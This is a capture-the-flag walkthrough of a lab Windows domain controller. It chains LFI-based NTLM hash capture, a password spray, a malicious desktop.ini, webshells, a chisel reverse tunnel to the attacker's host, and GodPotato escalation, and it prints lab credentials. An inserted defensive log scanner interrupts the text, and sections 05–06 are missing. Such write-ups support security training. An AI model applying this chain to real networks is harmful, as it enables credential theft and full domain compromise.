Hard Windows Active Directory machine with a long but logical chain. A PHP ?view= parameter accepts
UNC paths — pointing it at Responder captures an NTLMv2 hash for svc_apache. Password spray hits
S.Moon, who can write to a Shared share. A malicious desktop.ini captures
c.bum's hash, giving write access to the Apache webroot. A PHP webshell lands a shell as
svc_apache. RunasCs pivots to c.bum, who can write to IIS's development root on port 8000.
A chisel tunnel exposes the internal port, an ASPX webshell runs as the IIS AppPool with
SeImpersonatePrivilege, and GodPotato escalates to SYSTEM.
User Flag
C:\Users\C.Bum\Desktop\user.txt
Root Flag
C:\Users\Administrator\Desktop\root.txt
01 Reconnaissance
Full port scan confirms a Domain Controller. The web server on port 80 is Apache 2.4.52 with PHP 8.1.1 serving a static "g0 Aviation" site. Domain is flight.htb.
nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.228.120
53/tcp  open  domain        Windows DNS
80/tcp  open  http          Apache 2.4.52 (PHP 8.1.1) — "g0 Aviation"
88/tcp  open  kerberos-sec  Windows KDC
389/tcp open  ldap          Active Directory (Domain: flight.htb)
445/tcp open  microsoft-ds  SMB (signing required)
| clock-skew: +6h58m
clock skew ~7h: Kerberos requires clocks within 5 minutes of the DC. If you hit KRB_AP_ERR_SKEW, sync first: sudo ntpdate -u 10.129.228.120. NTLM-based attacks are unaffected by skew.
env setup
$ echo "10.129.228.120 flight.htb" | sudo tee -a /etc/hosts
$ export IP=10.129.228.120
$ export DOMAIN=flight.htb
SMB null auth works (the login succeeds) but share enumeration and RID brute-forcing are denied. Guest is disabled. We need credentials first — the web app is the way in.
02 VHost Discovery — school.flight.htb
The main site is a static brochure — no PHP endpoints, no login forms. Fuzz the Host header to discover other virtual hosts on the same IP.
common mistake: don't fuzz via http://FUZZ.flight.htb/ in the URL — that relies on DNS resolving the subdomain. Always use -H "Host: FUZZ.flight.htb" against the IP and filter by size to remove the baseline response.
add vhost
$ echo "10.129.228.120 school.flight.htb" | sudo tee -a /etc/hosts
school.flight.htb is a PHP site with a ?view= parameter — a classic LFI candidate.
03 LFI → UNC Path → NTLM Hash (svc_apache)
The ?view= parameter loads local files — confirmed by reading the hosts file directly. PHP's include() also supports UNC paths. When PHP on a Windows server tries to open \\attacker\share, Windows initiates an SMB connection and leaks an NTLMv2 hash.
confirm LFI
$ curl "http://school.flight.htb/index.php?view=c:/windows/system32/drivers/etc/hosts"
# Copyright (c) 1993-2009 Microsoft Corp.
...
127.0.0.1 localhost
credential: svc_apache:S@Ss!K@*t13
The hashcat mode for NTLMv2 is -m 5600 — not to be confused with NTLMv1 (-m 5500) or with Net-NTLMv2 relay attacks.
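A defender's log check for the ?view= abuse described above, added here as an example (it is not part of the original writeup and not the box's code): it parses Apache access-log lines, decodes the view parameter and flags UNC paths, absolute Windows paths, remote URLs and traversal. The log lines are constructed samples and the category names are my own.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed Apache combined-format log lines (not from the target); the ?view= values mirror the input the writeup abuses.
SAMPLE_LOG = """\
10.10.14.78 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?view=home.html HTTP/1.1" 200 1532 "-" "curl/8.0"
10.10.14.78 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?view=c:/windows/system32/drivers/etc/hosts HTTP/1.1" 200 824 "-" "curl/8.0"
10.10.14.78 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?view=//10.10.14.78/share/x HTTP/1.1" 200 0 "-" "curl/8.0"
10.10.14.78 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?view=..%2F..%2Fxampp%2Fapache%2Fconf%2Fhttpd.conf HTTP/1.1" 200 4000 "-" "curl/8.0"
10.10.14.78 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?view=%5C%5C10.10.14.78%5Cshare HTTP/1.1" 200 0 "-" "curl/8.0"
10.10.14.78 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?view=http://10.10.14.78/x HTTP/1.1" 200 0 "-" "curl/8.0"
"""

LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*"')
UNC_RE = re.compile(r'^(\\\\|//)[^\\/]+')               # \\host\share or //host/share
ABS_WIN_RE = re.compile(r'^[A-Za-z]:[\\/]')             # c:/... or c:\...
SCHEME_RE = re.compile(r'^[A-Za-z][A-Za-z0-9+.-]*://')  # http://..., ftp://... (allow_url_include)
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')    # ../ or ..\ segments


def classify_view(value):
    """Label one ?view= value. unquote() is a second decode on top of parse_qs, catching double-encoding."""
    v = unquote(value)
    if UNC_RE.match(v):
        return "unc"            # would make PHP on Windows authenticate over SMB
    if ABS_WIN_RE.match(v):
        return "absolute"       # local file read outside the webroot
    if SCHEME_RE.match(v):
        return "remote_url"     # remote include if allow_url_include is on
    if TRAVERSAL_RE.search(v):
        return "traversal"
    return "benign"


def scan_log(lines):
    """Return (client, decoded view value, category) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlparse(m.group("path")).query)
        for view in query.get("view", []):     # parse_qs already URL-decodes once
            category = classify_view(view)
            if category != "benign":
                hits.append((m.group("client"), unquote(view), category))
    return hits


if __name__ == "__main__":
    for client, view, category in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{client} {category:10} {view}")
```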
04 Password Spray → S.Moon → desktop.ini → c.bum
With svc_apache credentials we can enumerate domain users, then spray the cracked password across all accounts — service accounts often share passwords with regular users.
S.Moon can write to the Shared share. When a user browses a network share in Windows Explorer, their system auto-authenticates to load icons and thumbnails. Drop a desktop.ini pointing at our Responder to capture their hash.
From the svc_apache shell, internal recon reveals two important things: port 8000 is listening internally (IIS, not exposed externally), and c.bum has write access to C:\inetpub\development\ — the IIS app root on that port. We need to be c.bum to write there.
RunasCs runs commands as another user without needing an interactive logon session — useful when you have credentials but no GUI or interactive shell. Upload it via the Web share and pivot to c.bum.
C:\Users\C.Bum\Desktop> type user.txt
************************
07 Chisel Tunnel + IIS ASPX Webshell
Port 8000 is firewalled externally. Use chisel to create a reverse TCP tunnel so we can reach it from Kali, then deploy an ASPX webshell — this IIS instance doesn't serve PHP, so we need ASP.NET.
chisel — reverse tunnel
$ chisel server -p 9001 --reverse
C:\> chisel.exe client 10.10.14.78:9001 R:8000:127.0.0.1:8000
http://127.0.0.1:8000 on Kali now maps to port 8000 on the target. From the c.bum shell, copy the ASPX webshell, nc.exe, and GodPotato into C:\inetpub\development\:
$ curl "http://127.0.0.1:8000/shell.aspx?cmd=whoami"
iis apppool\defaultapppool
$ curl "http://127.0.0.1:8000/shell.aspx?cmd=whoami+/priv"
SeImpersonatePrivilege  Impersonate a client after authentication  Enabled
finding: IIS AppPool accounts almost always hold SeImpersonatePrivilege — they need it to impersonate authenticated web users. Combined with any potato exploit, SYSTEM is one command away.
08 GodPotato → SYSTEM
GodPotato abuses SeImpersonatePrivilege by tricking a SYSTEM-level COM server into authenticating to a fake endpoint we control, then stealing its token to run arbitrary commands as SYSTEM. Works on modern Windows without needing a writable named pipe.
$ nc -lvnp 4447
C:\> whoami
nt authority\system
C:\> type C:\Users\Administrator\Desktop\root.txt
************************
09 Full Attack Chain
attack chain summary
Nmap → DC on 10.129.228.120, Apache on port 80, clock skew ~7h
│
▼
ffuf vhost fuzz → school.flight.htb discovered
PHP ?view= parameter → LFI confirmed
│
▼
LFI + UNC path → Responder captures SMB auth
hashcat -m 5600 → svc_apache:S@Ss!K@*t13
│
▼
Password spray → S.Moon:S@Ss!K@*t13
Shared share WRITE → desktop.ini (malicious icon UNC)
→ Responder → hashcat → c.bum:Tikkycoll_431012284
│
▼
c.bum → Web share WRITE (C:\xampp\htdocs)
PHP webshell → shell as flight\svc_apache
│
▼
RunasCs (c.bum creds) → shell as flight\c.bum
→ user.txt ✓
→ write access to C:\inetpub\development\ (IIS port 8000)
│
▼
chisel reverse tunnel → port 8000 exposed on Kali
ASPX webshell deployed → iis apppool\defaultapppool
SeImpersonatePrivilege enabled
│
▼
GodPotato → token impersonation → nt authority\system
→ root.txt ✓
key takeaways:
· Any PHP include() accepting user input can be pointed at a UNC path to leak NTLMv2 hashes on Windows
· Always spray every cracked password across all known users — service accounts often share passwords
· A malicious desktop.ini with a UNC icon path captures hashes from anyone who browses the share
· SMB write to a webroot = PHP code execution; check net share to map share names to local paths
· RunasCs enables lateral movement with known creds without needing an interactive session
· Always run netstat -ano from a foothold — firewalled internal ports often host the privilege escalation path
· IIS AppPool + SeImpersonatePrivilege + GodPotato = SYSTEM on any modern Windows version
· Chisel is the go-to for tunneling through firewalled internal services